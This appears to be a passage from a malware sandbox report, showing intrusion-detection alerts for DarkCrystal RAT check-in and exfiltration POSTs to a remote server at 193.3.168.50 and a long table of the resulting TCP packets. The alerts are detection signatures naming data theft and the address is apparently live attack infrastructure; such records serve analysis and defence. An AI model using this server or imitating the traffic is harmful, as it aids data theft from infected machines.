2024-12-04T15:45:50.875167+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.5	49741	193.3.168.50	80	TCP
2024-12-04T15:46:03.737025+0100	2048130	ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST)	1	192.168.2.5	49785	193.3.168.50	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 4, 2024 15:45:49.472383976 CET	49741	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:49.592267990 CET	80	49741	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:49.592371941 CET	49741	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:49.593110085 CET	49741	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:49.712903023 CET	80	49741	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:49.990766048 CET	49741	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:50.110634089 CET	80	49741	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:50.859899044 CET	80	49741	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:50.875113964 CET	80	49741	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:50.875166893 CET	49741	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:50.875360012 CET	80	49741	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:50.921910048 CET	49741	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:51.042051077 CET	80	49741	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:51.276156902 CET	49741	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:51.312896013 CET	80	49741	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:51.396167040 CET	80	49741	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:51.446329117 CET	49741	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:51.692146063 CET	80	49741	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:51.758810997 CET	49741	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:53.092909098 CET	49741	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:53.212877035 CET	80	49741	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:53.341195107 CET	49753	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:53.450112104 CET	49741	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:53.461766005 CET	80	49753	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:53.461836100 CET	49753	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:53.468621969 CET	49753	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:53.484957933 CET	80	49741	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:53.569972038 CET	80	49741	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:53.588392973 CET	80	49753	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:53.650716066 CET	49741	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:53.839597940 CET	49753	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:53.933549881 CET	80	49741	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:53.960313082 CET	80	49753	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:53.960412979 CET	80	49753	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:54.112751961 CET	49741	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:54.114068031 CET	49756	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:54.232884884 CET	80	49741	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:54.233462095 CET	49741	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:54.233791113 CET	80	49756	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:54.234036922 CET	49756	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:54.234232903 CET	49756	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:54.354623079 CET	80	49756	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:54.587326050 CET	49756	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:54.707686901 CET	80	49756	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:54.762753963 CET	80	49753	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:54.871237993 CET	49753	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:54.996897936 CET	80	49753	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:55.086971045 CET	49753	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:55.504671097 CET	80	49756	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:55.586939096 CET	49756	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:55.738531113 CET	80	49756	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:55.876327038 CET	49753	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:55.876410961 CET	49756	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:55.877114058 CET	49761	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:55.996629953 CET	80	49753	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:55.996697903 CET	49753	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:55.997081995 CET	80	49756	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:55.997142076 CET	49756	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:55.997339010 CET	80	49761	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:55.997420073 CET	49761	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:55.997726917 CET	49761	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:56.118685961 CET	80	49761	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:56.358603001 CET	49761	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:56.479389906 CET	80	49761	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:57.237714052 CET	80	49761	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:57.290045977 CET	49761	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:57.472987890 CET	80	49761	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:57.562705040 CET	49761	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:57.635677099 CET	49761	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:57.638659000 CET	49764	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:57.756874084 CET	80	49761	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:57.757157087 CET	49761	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:57.758683920 CET	80	49764	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:57.758795977 CET	49764	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:57.759591103 CET	49764	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:57.879324913 CET	80	49764	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:58.118813038 CET	49764	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:58.238735914 CET	80	49764	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:58.997445107 CET	80	49764	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:59.086934090 CET	49764	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:59.236766100 CET	80	49764	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:59.290064096 CET	49764	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:59.387891054 CET	49764	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:59.388310909 CET	49771	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:59.508706093 CET	80	49771	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:59.508722067 CET	80	49764	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:59.508824110 CET	49764	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:59.508840084 CET	49771	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:59.509130001 CET	49771	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:59.628902912 CET	80	49771	193.3.168.50	192.168.2.5
Dec 4, 2024 15:45:59.868268013 CET	49771	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:45:59.988102913 CET	80	49771	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:00.362221956 CET	49776	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:00.482208014 CET	80	49776	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:00.482296944 CET	49776	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:00.495656967 CET	49776	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:00.617815018 CET	80	49776	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:00.747137070 CET	80	49771	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:00.852673054 CET	49776	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:00.946316957 CET	49771	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:00.972728968 CET	80	49776	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:00.972748041 CET	80	49776	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:00.982209921 CET	80	49771	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:01.055685997 CET	49771	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:01.136763096 CET	49771	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:01.137545109 CET	49779	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:01.257636070 CET	80	49771	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:01.257703066 CET	49771	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:01.257908106 CET	80	49779	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:01.258002996 CET	49779	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:01.284189939 CET	49779	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:01.404109955 CET	80	49779	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:01.634181023 CET	49779	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:01.754653931 CET	80	49779	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:01.755700111 CET	80	49776	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:01.946340084 CET	49776	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:01.988687038 CET	80	49776	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:02.058661938 CET	49776	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:02.496546030 CET	80	49779	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:02.586950064 CET	49779	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:02.731705904 CET	80	49779	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:02.883814096 CET	49779	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:02.966166019 CET	49776	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:02.966320992 CET	49779	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:02.966727018 CET	49785	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:03.002717972 CET	49786	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:03.089027882 CET	80	49776	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:03.089104891 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:03.089135885 CET	49776	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:03.089185953 CET	49785	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:03.089483976 CET	49785	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:03.089555979 CET	80	49779	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:03.089602947 CET	49779	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:03.123403072 CET	80	49786	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:03.123490095 CET	49786	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:03.123858929 CET	49786	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:03.209269047 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:03.243693113 CET	80	49786	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:03.446486950 CET	49785	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:03.477665901 CET	49786	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:03.568870068 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:03.568886995 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:03.568906069 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:03.568917036 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:03.568928957 CET	49785	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:03.568969965 CET	49785	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:03.568973064 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:03.568985939 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:03.569015026 CET	49785	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:03.569034100 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:03.569044113 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:03.569050074 CET	49785	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:03.569072962 CET	49785	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:03.569084883 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:03.569096088 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:03.569097042 CET	49785	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:03.569192886 CET	49785	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:03.602039099 CET	80	49786	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:03.688806057 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:03.688883066 CET	49785	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:03.688884020 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:03.688896894 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:03.688937902 CET	49785	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:03.688954115 CET	49785	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:03.688986063 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:03.688997030 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:03.689199924 CET	49785	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:03.736907959 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:03.737025023 CET	49785	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:03.852860928 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:03.852941990 CET	49785	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:03.900870085 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:03.901345015 CET	49785	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:04.017044067 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:04.057442904 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:04.057571888 CET	49785	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:04.177881956 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:04.178009033 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:04.178144932 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:04.178153992 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:04.178323984 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:04.178333044 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:04.178478003 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:04.178530931 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:04.178859949 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:04.178869963 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:04.179410934 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:04.179614067 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:04.179712057 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:04.179894924 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:04.180068970 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:04.327754974 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:04.363399982 CET	80	49786	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:04.461930990 CET	49785	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:04.477546930 CET	49786	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:04.600893974 CET	80	49786	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:04.738970995 CET	49786	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:04.739310026 CET	49789	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:04.935395956 CET	80	49786	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:04.935409069 CET	80	49789	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:04.935460091 CET	49786	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:04.935534000 CET	49789	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:04.936645031 CET	49789	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:04.979415894 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:05.149456024 CET	49785	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:05.176191092 CET	80	49789	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:05.299209118 CET	49789	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:05.418979883 CET	80	49789	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:06.175472975 CET	80	49789	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:06.290050983 CET	49789	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:06.412734032 CET	80	49789	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:06.477540016 CET	49789	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:06.567677021 CET	49785	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:06.567713022 CET	49789	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:06.568006992 CET	49793	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:06.689924002 CET	80	49793	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:06.690013885 CET	80	49785	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:06.690022945 CET	49793	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:06.690092087 CET	49785	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:06.690537930 CET	80	49789	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:06.690597057 CET	49789	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:06.740077019 CET	49793	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:06.864222050 CET	80	49793	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:07.301373005 CET	49793	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:07.443989038 CET	80	49793	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:07.957398891 CET	80	49793	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:08.057636023 CET	49799	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:08.086958885 CET	49793	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:08.178215027 CET	80	49799	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:08.178318024 CET	49799	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:08.178472996 CET	49799	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:08.194259882 CET	80	49793	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:08.298439980 CET	80	49799	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:08.319331884 CET	49793	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:08.319665909 CET	49800	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:08.442023993 CET	80	49793	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:08.442050934 CET	80	49800	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:08.442193985 CET	49793	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:08.442245960 CET	49800	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:08.442574978 CET	49800	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:08.524741888 CET	49799	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:08.562412024 CET	80	49800	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:08.645139933 CET	80	49799	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:08.645287991 CET	80	49799	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:08.792186975 CET	49800	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:08.912163973 CET	80	49800	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:09.682246923 CET	80	49800	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:09.790106058 CET	49800	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:09.929224968 CET	80	49800	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:09.977597952 CET	49800	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:10.458358049 CET	49800	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:10.458937883 CET	49806	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:10.578520060 CET	80	49800	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:10.578588963 CET	49800	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:10.578680038 CET	80	49806	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:10.578752041 CET	49806	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:10.590552092 CET	49806	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:10.710469961 CET	80	49806	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:10.964184999 CET	49806	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:11.084151983 CET	80	49806	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:11.816489935 CET	80	49806	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:11.946338892 CET	49806	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:12.053086996 CET	80	49806	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:12.223321915 CET	49806	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:12.223707914 CET	49807	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:12.344311953 CET	80	49807	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:12.344443083 CET	49807	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:12.344615936 CET	49807	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:12.345400095 CET	80	49806	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:12.345462084 CET	49806	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:12.429236889 CET	80	49799	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:12.464292049 CET	80	49807	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:12.555668116 CET	49799	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:12.669027090 CET	80	49799	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:12.705559015 CET	49807	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:12.758807898 CET	49799	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:12.825572014 CET	80	49807	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:13.636995077 CET	80	49807	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:13.680676937 CET	49807	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:13.875394106 CET	80	49807	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:13.941427946 CET	49807	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:13.995491028 CET	49799	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:13.995584965 CET	49807	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:13.995877028 CET	49814	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:14.115925074 CET	80	49814	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:14.115999937 CET	49814	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:14.116086960 CET	80	49799	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:14.116144896 CET	49799	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:14.116597891 CET	80	49807	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:14.116646051 CET	49807	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:14.119884014 CET	49814	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:14.239665031 CET	80	49814	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:14.477729082 CET	49814	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:14.597434044 CET	80	49814	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:15.354518890 CET	80	49814	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:15.402507067 CET	49814	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:15.610174894 CET	80	49814	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:15.696322918 CET	49814	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:16.230591059 CET	49814	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:16.232626915 CET	49820	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:16.351466894 CET	80	49814	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:16.351519108 CET	49814	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:16.352714062 CET	80	49820	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:16.352792978 CET	49820	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:16.354085922 CET	49820	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:16.474062920 CET	80	49820	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:16.712109089 CET	49820	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:16.832477093 CET	80	49820	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:17.590933084 CET	80	49820	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:17.697319984 CET	49825	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:17.758862019 CET	49820	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:17.817218065 CET	80	49825	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:17.820672989 CET	49825	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:17.820818901 CET	49825	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:17.826694012 CET	80	49820	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:17.940537930 CET	80	49825	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:17.946309090 CET	49820	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:17.950021982 CET	49820	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:17.950345993 CET	49826	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:18.070051908 CET	80	49826	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:18.070142984 CET	49826	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:18.070302963 CET	49826	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:18.070343971 CET	80	49820	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:18.070446968 CET	49820	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:18.165668964 CET	49825	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:18.190412998 CET	80	49826	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:18.285623074 CET	80	49825	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:18.285691977 CET	80	49825	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:18.430936098 CET	49826	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:18.551764011 CET	80	49826	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:19.139260054 CET	80	49825	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:19.260226965 CET	49825	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:19.348412991 CET	80	49826	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:19.372956038 CET	80	49825	193.3.168.50	192.168.2.5
Dec 4, 2024 15:46:19.461916924 CET	49825	80	192.168.2.5	193.3.168.50
Dec 4, 2024 15:46:19.581136942 CET	80	49826	193.3.168.50	192.168.2.5
